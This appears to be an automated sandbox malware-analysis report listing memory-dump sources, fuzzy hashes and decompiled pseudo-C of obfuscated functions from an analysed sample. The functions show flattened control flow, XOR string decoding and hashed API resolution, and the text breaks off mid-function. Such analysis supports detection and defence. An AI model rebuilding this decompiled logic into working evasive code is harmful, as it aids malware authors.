                                                                                                                                                        0x012d6184
                                                                                                                                                        0x012d618f
                                                                                                                                                        0x012d6194
                                                                                                                                                        0x012d619b
                                                                                                                                                        0x012d619d
                                                                                                                                                        0x012d619d
                                                                                                                                                        0x012d617a
                                                                                                                                                        0x012d616f
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012d6164

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: t(p$t(p
                                                                                                                                                        • API String ID: 0-3912243617
                                                                                                                                                        • Opcode ID: 52caa751942108074cc48f60bd53350d26c76f883145557b13030c694f816611
                                                                                                                                                        • Instruction ID: a7fb86ec916a085d13fdb4cf8ecc9ebcc7c53d12f1f631d4bf65b935311bd514
                                                                                                                                                        • Opcode Fuzzy Hash: 52caa751942108074cc48f60bd53350d26c76f883145557b13030c694f816611
                                                                                                                                                        • Instruction Fuzzy Hash: 9D91D5737286858BDB65CE1DE88062EBBA1F3C9750F544129EF9AC7B59CB78C8418F00
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012DE007, Relevance: 1.7, Strings: 1, Instructions: 450COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 55%
                                                                                                                                                        			E012DE007(void* __ebx, void* __edi, void* __esi, long long __rcx, long long __rdx, void* __r8) {
				void* _v96;
				signed long long _v104;
				signed long long _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				char _v220;
				void* _v224;
				void* _v232;
				void* _v240;
				void* _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				void* _v280;
				void* _v288;
				void* _v296;
				intOrPtr _v300;
				signed long long _v312;
				signed long long _v316;
				char _v320;
				intOrPtr _v324;
				signed long long _v336;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				signed long long _v356;
				char _v360;
				signed int _v364;
				char _v365;
				char _v366;
				intOrPtr _v376;
				intOrPtr _v384;
				long long _v392;
				void* _t164;
				void* _t191;
				signed int _t195;
				signed int _t257;
				void* _t272;
				void* _t273;
				signed long long _t290;
				intOrPtr* _t294;
				intOrPtr* _t299;
				signed long long _t304;
				void* _t323;

				_t273 = __esi;
				_t272 = __edi;
				_t323 =  &_v360;
				asm("movaps [esp+0x150], xmm6");
				_v296 = __rdx;
				_v96 = __rcx;
				_t299 =  &_v360;
				_v248 = _t299;
				_t290 = _v248;
				 *_t299 = 0;
				_t294 =  &_v220;
				 *((char*)(_t294 - 4)) = 0;
				 *_t294 = 0x1ed0ae10;
				 *((intOrPtr*)(_t294 + 4)) = 0x1ec0ae11;
				 *((intOrPtr*)(_t294 + 8)) = 0x1eccae14;
				 *((intOrPtr*)(_t294 + 0xc)) = 0x1ea0ae05;
				 *((intOrPtr*)(_t294 + 0x10)) = 0x1ea7ae6d;
				 *((intOrPtr*)(_t294 + 0x14)) = 0x1e93ae55;
				if( *((intOrPtr*)(_t294 - 4)) != 0) {
					L3:
					r8d = 0xf85d7891;
					r9d = 0x20a;
					E012DFAD7(0xb, _t273, _t290, _t299);
					r8d = 0;
					r9d = 0;
					_v300 =  *_t290();
					_v104 =  &_v224 | _t290;
					_t304 =  &_v280 | _t290;
					_v112 = _t304;
					_t164 = 0xb807d9eb;
					asm("xorps xmm6, xmm6");
					_v352 = 0;
					_v344 = 0;
					_v340 = 0;
					_v348 = 0;
					L4:
					while(_t164 <= 0xc4fc8cae) {
						if(_t164 > 0xb807d9ea) {
							if(_t164 > 0xbd804a5b) {
								if(_t164 == 0xbd804a5c) {
									_v316 = _v356 + 1;
									_t164 =  ==  ? 0xb63fdac5 : 0xa9038522;
									continue;
								}
								if(_t164 == 0xbd86bb8a) {
									_v224 = bpl;
									_v220 = 0x7ac72340;
									_v216 = 0x49946035;
									_v212 = 0x814b663e;
									_v208 = 0x7358e615;
									_v204 = 0xd2c7fb49;
									_v200 = 0x3498a22c;
									_v196 = 0xbf96c509;
									_v192 = 0xcac1de77;
									_v188 = 0x3c4a0c12;
									_v184 = 0xf270f660;
									_v180 = 0xbc329da5;
									_v176 = 0x845c1482;
									_v172 = 0x9473f2dd;
									_v168 = 0xcdaa33ed;
									_v164 = 0xf9107a5f;
									_v160 = 0x65bde499;
									_v156 = 0x3b9c5d6;
									_v152 = 0x9c073b68;
									_v148 = 0x439522a;
									_v144 = 0x52fdfc41;
									_v140 = 0xcc35be56;
									_v136 = 0x4f3ef10a;
									_v132 = 0xaae682cb;
									_v128 = 0xf3440175;
									_v124 = 0x8a1687d1;
									_v120 = 0x9350a150;
									_v116 = 0x49946005;
									if(_v224 != bpl) {
										L59:
										_v280 = bpl;
										_v276 = 0x71d94e36;
										_v272 = 0x71ca4e30;
										_v268 = 0x71d84e26;
										_v264 = 0x71d34e3f;
										_v260 = 0x71d84e30;
										_v256 = 0x71d54e3f;
										_v252 = 0x719a4e31;
										if(_v280 != bpl) {
											L62:
											r8d = 0x4b408f42;
											r9d = 0x211;
											E012DFAD7(0xb, _t273, _t290, _t304);
											_v392 = _v104;
											_v376 = 0;
											_v384 = 0x68;
											_t304 =  *0x12e5010;
											 *_t290();
											_t164 =  ==  ? 0x2718c397 : 0xc05e2587;
											continue;
										}
										do {
											 *(_t323 + 0x90 + _t290 * 4) = ( *(_t323 + 0x90 + _t290 * 4) & 0x712e1312 |  !( *(_t323 + 0x90 + _t290 * 4)) & 0x8ed1eced) ^ 0xff4ba29e;
											_t304 = _t304 + 1;
											_t290 = _t290 + 1;
										} while (_t290 != 8);
										goto L62;
									}
									do {
										_t257 =  *(_t323 + 0xc8 + _t290 * 4);
										_t215 =  !_t257 & 0x49946005;
										 *(_t323 + 0xc8 + _t290 * 4) = _t257 & 0xb66b9ffa |  !_t257 & 0x49946005;
										_t304 = _t304 + 1;
										_t290 = _t290 + 1;
									} while (_t290 != 0x1c);
									goto L59;
								}
								if(_t164 == 0xc05e2587) {
									_t164 = 0x5120f13d;
									_v352 = 0;
								}
							} else {
								if(_t164 == 0xb807d9eb) {
									_t164 =  ==  ? 0xbd86bb8a : 0x5eee0e71;
								} else {
									if(_t164 == 0xb8e76d73) {
										_t215 = _v364;
										r8d = 0x8dc3e0bd;
										r9d = 0x1ed;
										E012DFAD7(7, _t273, _t290, _t304);
										asm("movups [esp+0x28], xmm6");
										_v392 =  &_v360;
										_t304 = _v336;
										r8d = 1;
										r9d = 0;
										 *_t290();
										_t164 =  ==  ? 0xdb8ee93c : 0x80014171;
									} else {
										if(_t164 == 0xb9148738) {
											_v240 =  &_v288;
											_v232 =  &_v320;
											_t290 = _v232;
											_v320 = 0;
											r8d = 0x6efba682;
											r9d = 0x84;
											E012DFAD7(1, _t273, _t290, _t304);
											_t191 =  *_t290();
											_t304 = _v96;
											E012DD57B(_t215, _t191, _t272, _t273, _t304,  &_v288,  &_v320);
											_t164 =  !=  ? 0xeca65290 : 0x136b81d5;
										}
									}
								}
							}
						} else {
							if(_t164 > 0x9f1c2664) {
								if(_t164 == 0x9f1c2665) {
									_t164 = 0x5959e98b;
									_v340 = 0;
								} else {
									if(_t164 == 0xa9038522) {
										_t304 = _v336;
										 *((char*)(_t304 + _t290)) = _v366;
										_t164 = 0x448d2166;
										r12d = _v316;
									} else {
										if(_t164 == 0xb63fdac5) {
											_t290 = _v316;
											_t195 = E012DD42C( *((intOrPtr*)(_v296 + _t290)), _t290);
											 *((char*)(_v336 + _t304)) = E012DD42C( *((intOrPtr*)(_v296 + _t290)), _t290) + (_t195 << 4);
											r12d = _v356;
											r12d = r12d + 3;
											_t164 = 0x448d2166;
										}
									}
								}
							} else {
								if(_t164 == 0x80014171) {
									E012DCDB9(_v360, _t290);
									_v312 = _t290;
									r14d = _v364;
									r8d = 0x8dc3e0bd;
									r9d = 0x1ed;
									E012DFAD7(7, _t273, _t290, _t304);
									asm("movups [esp+0x28], xmm6");
									_v392 =  &_v360;
									_t304 = _v336;
									r8d = 1;
									 *_t290();
									_t164 =  ==  ? 0x9f1c2665 : 0xb9148738;
								} else {
									if(_t164 == 0x850cd2b4) {
										_t290 = _v240;
										_t164 = 0x5959e98b;
										_v340 = _v348;
									} else {
										if(_t164 == 0x96fdfc19) {
											_t304 = _v288;
											E012DCC2E(_t290, _t304);
											_t164 = 0x850cd2b4;
											_v348 = _v365;
										}
									}
								}
							}
						}
					}
					if(_t164 <= 0x2718c396) {
						if(_t164 > 0xfefb9e30) {
							if(_t164 == 0xfefb9e31) {
								E012DCC2E(_t290, _v336);
								r8d = 0xe1820471;
								r9d = 0x213;
								E012DFAD7(0xb, _t273, _t290, _v336);
								_t304 =  *0x12e5020;
								 *_t290();
								_t164 = 0x5120f13d;
								_v352 = _v344;
								goto L4;
							}
							if(_t164 == 0x136b81d5) {
								_t164 = 0x850cd2b4;
								_v348 = 0;
								goto L4;
							}
							if(_t164 != 0x16b86367) {
								goto L4;
							}
							r15b = r15b & 0x00000001;
							asm("movaps xmm6, [esp+0x150]");
							return r15d;
						} else {
							if(_t164 == 0xc4fc8caf) {
								_v356 = _v324;
								_v364 = r13d;
								_t290 = _v356;
								_t304 = _v296;
								_v366 =  *((intOrPtr*)(_t304 + _t290));
								_t164 =  ==  ? 0xb8e76d73 : 0xbd804a5c;
							} else {
								if(_t164 == 0xdb8ee93c) {
									_t164 = 0xfefb9e31;
									_v344 = 0;
								} else {
									if(_t164 == 0xeca65290) {
										r14d = _v320;
										r8d = 0x7958f7d7;
										r9d = 0x212;
										E012DFAD7(0xb, _t273, _t290, _t304);
										_v384 = _v360;
										_v392 = _v312;
										_v376 = 0;
										_t304 =  *0x12e5020;
										r9d = r14d;
										_v365 =  *_t290() == 0;
										_t164 =  ==  ? 0x96fdfc19 : 0x2a929367;
									}
								}
							}
							goto L4;
						}
					} else {
						if(_t164 > 0x5120f13c) {
							if(_t164 == 0x5120f13d) {
								r8d = 0x847fc36c;
								r9d = 0x20c;
								E012DFAD7(0xb, _t273, _t290, _t304);
								_t304 =  *0x12e5010;
								 *_t290();
								_t164 = 0x16b86367;
								r15d = _v352;
							} else {
								if(_t164 == 0x5959e98b) {
									_t304 = _v312;
									E012DCC2E(_t290, _t304);
									_t164 = 0xfefb9e31;
									_v344 = _v340;
								} else {
									if(_t164 == 0x5eee0e71) {
										_t164 = 0x16b86367;
										r15d = 0;
									}
								}
							}
						} else {
							if(_t164 == 0x2718c397) {
								E012DCDB9(0xbb8, _t290);
								_v336 = _t290;
								_t164 = 0xc4fc8caf;
								_v324 = 0;
								r13d = 0;
							} else {
								if(_t164 == 0x2a929367) {
									_t164 = 0x96fdfc19;
								} else {
									if(_t164 == 0x448d2166) {
										r13d = _v364;
										r13d = r13d + 1;
										_t164 = 0xc4fc8caf;
										_v324 = r12d;
									}
								}
							}
						}
						goto L4;
					}
				} else {
					do {
						 *(_t323 + 0xc8 + _t290 * 4) = ( *(_t323 + 0xc8 + _t290 * 4) & 0xd9490679 |  !( *(_t323 + 0xc8 + _t290 * 4)) & 0x26b6f986) ^ 0x382557d3;
						_t299 = _t299 + 1;
						_t290 = _t290 + 1;
					} while (_t290 != 7);
					goto L3;
				}
			}












































































                                                                                                                                                        0x012de007
                                                                                                                                                        0x012de007
                                                                                                                                                        0x012de013
                                                                                                                                                        0x012de01a
                                                                                                                                                        0x012de022
                                                                                                                                                        0x012de02a
                                                                                                                                                        0x012de032
                                                                                                                                                        0x012de037
                                                                                                                                                        0x012de03f
                                                                                                                                                        0x012de047
                                                                                                                                                        0x012de04f
                                                                                                                                                        0x012de057
                                                                                                                                                        0x012de05a
                                                                                                                                                        0x012de060
                                                                                                                                                        0x012de067
                                                                                                                                                        0x012de06e
                                                                                                                                                        0x012de075
                                                                                                                                                        0x012de07c
                                                                                                                                                        0x012de086
                                                                                                                                                        0x012de0c1
                                                                                                                                                        0x012de0ca
                                                                                                                                                        0x012de0d0
                                                                                                                                                        0x012de0d6
                                                                                                                                                        0x012de0e5
                                                                                                                                                        0x012de0e8
                                                                                                                                                        0x012de0ed
                                                                                                                                                        0x012de101
                                                                                                                                                        0x012de111
                                                                                                                                                        0x012de114
                                                                                                                                                        0x012de11c
                                                                                                                                                        0x012de121
                                                                                                                                                        0x012de124
                                                                                                                                                        0x012de128
                                                                                                                                                        0x012de12c
                                                                                                                                                        0x012de130
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012de134
                                                                                                                                                        0x012de140
                                                                                                                                                        0x012de1dd
                                                                                                                                                        0x012de3c1
                                                                                                                                                        0x012de613
                                                                                                                                                        0x012de621
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012de621
                                                                                                                                                        0x012de3cc
                                                                                                                                                        0x012de629
                                                                                                                                                        0x012de631
                                                                                                                                                        0x012de63c
                                                                                                                                                        0x012de647
                                                                                                                                                        0x012de652
                                                                                                                                                        0x012de65d
                                                                                                                                                        0x012de668
                                                                                                                                                        0x012de673
                                                                                                                                                        0x012de67e
                                                                                                                                                        0x012de689
                                                                                                                                                        0x012de694
                                                                                                                                                        0x012de69f
                                                                                                                                                        0x012de6aa
                                                                                                                                                        0x012de6b5
                                                                                                                                                        0x012de6c0
                                                                                                                                                        0x012de6cb
                                                                                                                                                        0x012de6d6
                                                                                                                                                        0x012de6e1
                                                                                                                                                        0x012de6ec
                                                                                                                                                        0x012de6f7
                                                                                                                                                        0x012de702
                                                                                                                                                        0x012de70d
                                                                                                                                                        0x012de718
                                                                                                                                                        0x012de723
                                                                                                                                                        0x012de72e
                                                                                                                                                        0x012de739
                                                                                                                                                        0x012de744
                                                                                                                                                        0x012de74f
                                                                                                                                                        0x012de762
                                                                                                                                                        0x012de797
                                                                                                                                                        0x012de797
                                                                                                                                                        0x012de79f
                                                                                                                                                        0x012de7aa
                                                                                                                                                        0x012de7b5
                                                                                                                                                        0x012de7c0
                                                                                                                                                        0x012de7cb
                                                                                                                                                        0x012de7d6
                                                                                                                                                        0x012de7e1
                                                                                                                                                        0x012de7f4
                                                                                                                                                        0x012de82f
                                                                                                                                                        0x012de83d
                                                                                                                                                        0x012de843
                                                                                                                                                        0x012de849
                                                                                                                                                        0x012de856
                                                                                                                                                        0x012de85b
                                                                                                                                                        0x012de863
                                                                                                                                                        0x012de86b
                                                                                                                                                        0x012de87f
                                                                                                                                                        0x012de88d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012de88d
                                                                                                                                                        0x012de7fd
                                                                                                                                                        0x012de81c
                                                                                                                                                        0x012de823
                                                                                                                                                        0x012de826
                                                                                                                                                        0x012de829
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012de7fd
                                                                                                                                                        0x012de76b
                                                                                                                                                        0x012de76b
                                                                                                                                                        0x012de776
                                                                                                                                                        0x012de784
                                                                                                                                                        0x012de78b
                                                                                                                                                        0x012de78e
                                                                                                                                                        0x012de791
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012de76b
                                                                                                                                                        0x012de3d7
                                                                                                                                                        0x012de3dd
                                                                                                                                                        0x012de3e2
                                                                                                                                                        0x012de3e2
                                                                                                                                                        0x012de1e3
                                                                                                                                                        0x012de1e8
                                                                                                                                                        0x012de4de
                                                                                                                                                        0x012de1ee
                                                                                                                                                        0x012de1f3
                                                                                                                                                        0x012de4eb
                                                                                                                                                        0x012de4f6
                                                                                                                                                        0x012de4fc
                                                                                                                                                        0x012de502
                                                                                                                                                        0x012de507
                                                                                                                                                        0x012de511
                                                                                                                                                        0x012de516
                                                                                                                                                        0x012de51b
                                                                                                                                                        0x012de521
                                                                                                                                                        0x012de524
                                                                                                                                                        0x012de533
                                                                                                                                                        0x012de1f9
                                                                                                                                                        0x012de1fe
                                                                                                                                                        0x012de20c
                                                                                                                                                        0x012de221
                                                                                                                                                        0x012de229
                                                                                                                                                        0x012de231
                                                                                                                                                        0x012de240
                                                                                                                                                        0x012de246
                                                                                                                                                        0x012de24c
                                                                                                                                                        0x012de25c
                                                                                                                                                        0x012de25e
                                                                                                                                                        0x012de269
                                                                                                                                                        0x012de27a
                                                                                                                                                        0x012de27a
                                                                                                                                                        0x012de1fe
                                                                                                                                                        0x012de1f3
                                                                                                                                                        0x012de1e8
                                                                                                                                                        0x012de146
                                                                                                                                                        0x012de14b
                                                                                                                                                        0x012de326
                                                                                                                                                        0x012de585
                                                                                                                                                        0x012de58a
                                                                                                                                                        0x012de32c
                                                                                                                                                        0x012de331
                                                                                                                                                        0x012de59b
                                                                                                                                                        0x012de5a4
                                                                                                                                                        0x012de5a7
                                                                                                                                                        0x012de5ac
                                                                                                                                                        0x012de337
                                                                                                                                                        0x012de33c
                                                                                                                                                        0x012de342
                                                                                                                                                        0x012de352
                                                                                                                                                        0x012de378
                                                                                                                                                        0x012de37b
                                                                                                                                                        0x012de380
                                                                                                                                                        0x012de384
                                                                                                                                                        0x012de384
                                                                                                                                                        0x012de33c
                                                                                                                                                        0x012de331
                                                                                                                                                        0x012de151
                                                                                                                                                        0x012de156
                                                                                                                                                        0x012de419
                                                                                                                                                        0x012de41e
                                                                                                                                                        0x012de42d
                                                                                                                                                        0x012de439
                                                                                                                                                        0x012de43f
                                                                                                                                                        0x012de445
                                                                                                                                                        0x012de44a
                                                                                                                                                        0x012de454
                                                                                                                                                        0x012de459
                                                                                                                                                        0x012de45f
                                                                                                                                                        0x012de468
                                                                                                                                                        0x012de477
                                                                                                                                                        0x012de15c
                                                                                                                                                        0x012de161
                                                                                                                                                        0x012de487
                                                                                                                                                        0x012de48f
                                                                                                                                                        0x012de498
                                                                                                                                                        0x012de167
                                                                                                                                                        0x012de16c
                                                                                                                                                        0x012de16e
                                                                                                                                                        0x012de176
                                                                                                                                                        0x012de17b
                                                                                                                                                        0x012de184
                                                                                                                                                        0x012de184
                                                                                                                                                        0x012de16c
                                                                                                                                                        0x012de161
                                                                                                                                                        0x012de156
                                                                                                                                                        0x012de14b
                                                                                                                                                        0x012de140
                                                                                                                                                        0x012de18f
                                                                                                                                                        0x012de287
                                                                                                                                                        0x012de3f4
                                                                                                                                                        0x012de89a
                                                                                                                                                        0x012de8ad
                                                                                                                                                        0x012de8b3
                                                                                                                                                        0x012de8b9
                                                                                                                                                        0x012de8be
                                                                                                                                                        0x012de8c1
                                                                                                                                                        0x012de8c3
                                                                                                                                                        0x012de8cc
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012de8cc
                                                                                                                                                        0x012de3ff
                                                                                                                                                        0x012de8d5
                                                                                                                                                        0x012de8da
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012de8da
                                                                                                                                                        0x012de40a
                                                                                                                                                        0x00000000
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012de8e7
                                                                                                                                                        0x012de8f6
                                                                                                                                                        0x012de911
                                                                                                                                                        0x012de28d
                                                                                                                                                        0x012de292
                                                                                                                                                        0x012de53f
                                                                                                                                                        0x012de543
                                                                                                                                                        0x012de548
                                                                                                                                                        0x012de54d
                                                                                                                                                        0x012de558
                                                                                                                                                        0x012de56b
                                                                                                                                                        0x012de298
                                                                                                                                                        0x012de29d
                                                                                                                                                        0x012de573
                                                                                                                                                        0x012de578
                                                                                                                                                        0x012de2a3
                                                                                                                                                        0x012de2a8
                                                                                                                                                        0x012de2b2
                                                                                                                                                        0x012de2d2
                                                                                                                                                        0x012de2d8
                                                                                                                                                        0x012de2de
                                                                                                                                                        0x012de2e3
                                                                                                                                                        0x012de2e9
                                                                                                                                                        0x012de2ee
                                                                                                                                                        0x012de2f6
                                                                                                                                                        0x012de2fe
                                                                                                                                                        0x012de305
                                                                                                                                                        0x012de319
                                                                                                                                                        0x012de319
                                                                                                                                                        0x012de2a8
                                                                                                                                                        0x012de29d
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012de292
                                                                                                                                                        0x012de195
                                                                                                                                                        0x012de19a
                                                                                                                                                        0x012de393
                                                                                                                                                        0x012de5c4
                                                                                                                                                        0x012de5ca
                                                                                                                                                        0x012de5d0
                                                                                                                                                        0x012de5d5
                                                                                                                                                        0x012de5da
                                                                                                                                                        0x012de5dc
                                                                                                                                                        0x012de5e1
                                                                                                                                                        0x012de399
                                                                                                                                                        0x012de39e
                                                                                                                                                        0x012de5eb
                                                                                                                                                        0x012de5f0
                                                                                                                                                        0x012de5f5
                                                                                                                                                        0x012de5fe
                                                                                                                                                        0x012de3a4
                                                                                                                                                        0x012de3a9
                                                                                                                                                        0x012de3af
                                                                                                                                                        0x012de3b4
                                                                                                                                                        0x012de3b4
                                                                                                                                                        0x012de3a9
                                                                                                                                                        0x012de39e
                                                                                                                                                        0x012de1a0
                                                                                                                                                        0x012de1a5
                                                                                                                                                        0x012de4a6
                                                                                                                                                        0x012de4ab
                                                                                                                                                        0x012de4b0
                                                                                                                                                        0x012de4b5
                                                                                                                                                        0x012de4bd
                                                                                                                                                        0x012de1ab
                                                                                                                                                        0x012de1b0
                                                                                                                                                        0x012de4c5
                                                                                                                                                        0x012de1b6
                                                                                                                                                        0x012de1bb
                                                                                                                                                        0x012de1c1
                                                                                                                                                        0x012de1c6
                                                                                                                                                        0x012de1c9
                                                                                                                                                        0x012de1ce
                                                                                                                                                        0x012de1ce
                                                                                                                                                        0x012de1bb
                                                                                                                                                        0x012de1b0
                                                                                                                                                        0x012de1a5
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012de19a
                                                                                                                                                        0x012de088
                                                                                                                                                        0x012de08f
                                                                                                                                                        0x012de0ae
                                                                                                                                                        0x012de0b5
                                                                                                                                                        0x012de0b8
                                                                                                                                                        0x012de0bb
                                                                                                                                                        0x00000000
                                                                                                                                                        0x012de08f

                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.368911222.00000000012D1000.00000020.00000001.sdmp, Offset: 012D0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.368893013.00000000012D0000.00000002.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368940818.00000000012E4000.00000040.00000001.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.368999147.00000000012E7000.00000040.00000001.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID: h
                                                                                                                                                        • API String ID: 0-2439710439
                                                                                                                                                        • Opcode ID: 30c81d17fc4b588c62b3a09bb86c8b4d993faf9a7222ff7e2de93f9b1038d262
                                                                                                                                                        • Instruction ID: c24e1d20b9f0839c732336a0b7991ed66eb38872093bb368dfa0f92a650cd7d8
                                                                                                                                                        • Opcode Fuzzy Hash: 30c81d17fc4b588c62b3a09bb86c8b4d993faf9a7222ff7e2de93f9b1038d262
                                                                                                                                                        • Instruction Fuzzy Hash: 5B12B0722292C18ADB358F59F4507AEBB60F399748F544119EBCA8BB58DB7CC846CF01
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 00007FFD696A1788, Relevance: .6, Instructions: 650COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000005.00000002.369882428.00007FFD696A1000.00000020.00020000.sdmp, Offset: 00007FFD696A0000, based on PE: true
                                                                                                                                                        • Associated: 00000005.00000002.369865940.00007FFD696A0000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369900853.00007FFD696BA000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369921866.00007FFD696CD000.00000004.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369945199.00007FFD696CF000.00000002.00020000.sdmp Download File
                                                                                                                                                        • Associated: 00000005.00000002.369953900.00007FFD696D1000.00000002.00020000.sdmp Download File
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 290d845963b53f439fe29f0c906100b65bdf8414ed25897985dfe852000aabc8
                                                                                                                                                        • Instruction ID: 40d4bb7df19468cd6326899fefe0a5e5ba82d8ae5c6d6930cfcfeb67757d6786
                                                                                                                                                        • Opcode Fuzzy Hash: 290d845963b53f439fe29f0c906100b65bdf8414ed25897985dfe852000aabc8
                                                                                                                                                        • Instruction Fuzzy Hash: 11229C63B28A7943E3188C7A8868739A942A7447A9F178339CE7B57BD0DD7DDC01C784
                                                                                                                                                        Uniqueness

                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                        Function 012DD57B, Relevance: .4, Instructions: 387COMMONCrypto
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        C-Code - Quality: 51%
                                                                                                                                                        			E012DD57B(void* __ebx, intOrPtr __edx, void* __edi, char __esi, long long __rcx, signed long long* __r8, long long __r9) {
				void* _v72;
				signed long long* _v80;
				long long _v88;
				signed long long _v96;
				long long _v104;
				signed long long _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				void* _v128;
				long long _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				char _v172;
				void* _v176;
				char _v180;
				char _v184;
				signed long long _v192;
				signed long long _v200;
				void* _v208;
				char _v212;
				intOrPtr _v232;
				intOrPtr _v240;
				long long _v248;
				void* _t113;
				void* _t157;
				char _t213;
				intOrPtr* _t233;
				signed long long _t235;
				intOrPtr* _t242;
				signed long long _t243;
				signed long long _t246;
				intOrPtr* _t262;
				void* _t278;

				_t213 = __esi;
				_v72 = __r9;
				_v80 = __r8;
				_v120 = __edx;
				_v88 = __rcx;
				_t233 =  &_v180;
				_v136 = _t233;
				r12d = 0;
				 *_t233 = r12d;
				_t242 =  &_v184;
				_v104 = _t242;
				 *_t242 = r12d;
				_t235 =  &_v208;
				_v96 = _t235;
				_t243 = _v96;
				 *_t235 = 0;
				_t262 =  &_v172;
				 *((intOrPtr*)(_t262 - 4)) = r12b;
				 *_t262 = 0x32b12c66;
				 *((intOrPtr*)(_t262 + 4)) = 0x32ca2c74;
				 *((intOrPtr*)(_t262 + 8)) = 0x32cd2c0d;
				 *((intOrPtr*)(_t262 + 0xc)) = 0x32f92c35;
				if( *((intOrPtr*)(_t262 - 4)) != r12b) {
					L3:
					r8d = 0xf85d7891;
					r9d = 0x20a;
					E012DFAD7(0xb, _t213, _t235, _t243);
					r8d = 0;
					r9d = 0;
					_v116 =  *_t235();
					_t246 =  &_v176 | _t235;
					_v112 = _t246;
					_t113 = 0xe4c602b;
					L4:
					while(_t113 <= 0xe4c602a) {
						if(_t113 > 0xb79bb1e1) {
							if(_t113 <= 0xd59c4450) {
								if(_t113 == 0xcb08a099) {
									r8d = 0x847fc36c;
									r9d = 0x20c;
									E012DFAD7(0xb, _t213, _t235, _t246);
									 *_t235();
									_t235 = _v192;
									 *_v80 = _t235;
									_t246 = _v72;
									 *_t246 = _v212;
									r14b = ((r15d ^ 0x000000fe) & r15b) != 0;
									_t113 = 0x34edd2d1;
									continue;
								}
								if(_t113 != 0xb79bb1e2) {
									continue;
								}
								r13b = r13b & 0x00000001;
								return r13d;
							}
							if(_t113 == 0xd59c4451) {
								r14d = 0;
								L45:
								r8d = 0x847fc36c;
								r9d = 0x20c;
								E012DFAD7(0xb, _t213, _t235, _t246);
								 *_t235();
								E012DCC2E(_t235, _v200);
								_t246 = _v192;
								E012DCC2E(_t235, _t246);
								_t113 = 0x34edd2d1;
								continue;
							}
							if(_t113 == 0xe1215c05) {
								E012DCDB9(_v212, _t235);
								_v192 = _t235;
								_t213 = _v180;
								r8d = 0xd894ff16;
								r9d = 0x20d;
								E012DFAD7(0xb, _t213, _t235, _t246);
								_v232 = r12d;
								_v240 = r12d;
								_v248 = 0;
								_t246 =  *0x12e5018;
								r9d = _t213;
								 *_t235();
								_t113 =  ==  ? 0x932182e7 : 0xd59c4451;
							}
							continue;
						}
						if(_t113 > 0x94d6590b) {
							if(_t113 == 0x94d6590c) {
								_t235 = _v128;
								_t113 = 0xb79bb1e2;
								r13d = _t157;
								continue;
							}
							if(_t113 != 0xa88bcdf0) {
								continue;
							}
							r14d = 0;
							r8d = 0xc1613d9c;
							r9d = 0x20f;
							E012DFAD7(0xb, _t213, _t235, _t246);
							_t246 = _v208;
							 *_t235();
							goto L45;
						} else {
							if(_t113 == 0x8b8b8d3a) {
								_t113 = 0xb79bb1e2;
								r13d = 0;
							} else {
								if(_t113 == 0x932182e7) {
									r8d = 0x85fe34a3;
									r9d = 0x20e;
									E012DFAD7(0xb, _t213, _t235, _t246);
									_t246 = _v208;
									r8d = _v120;
									r9d = 0;
									 *_t235();
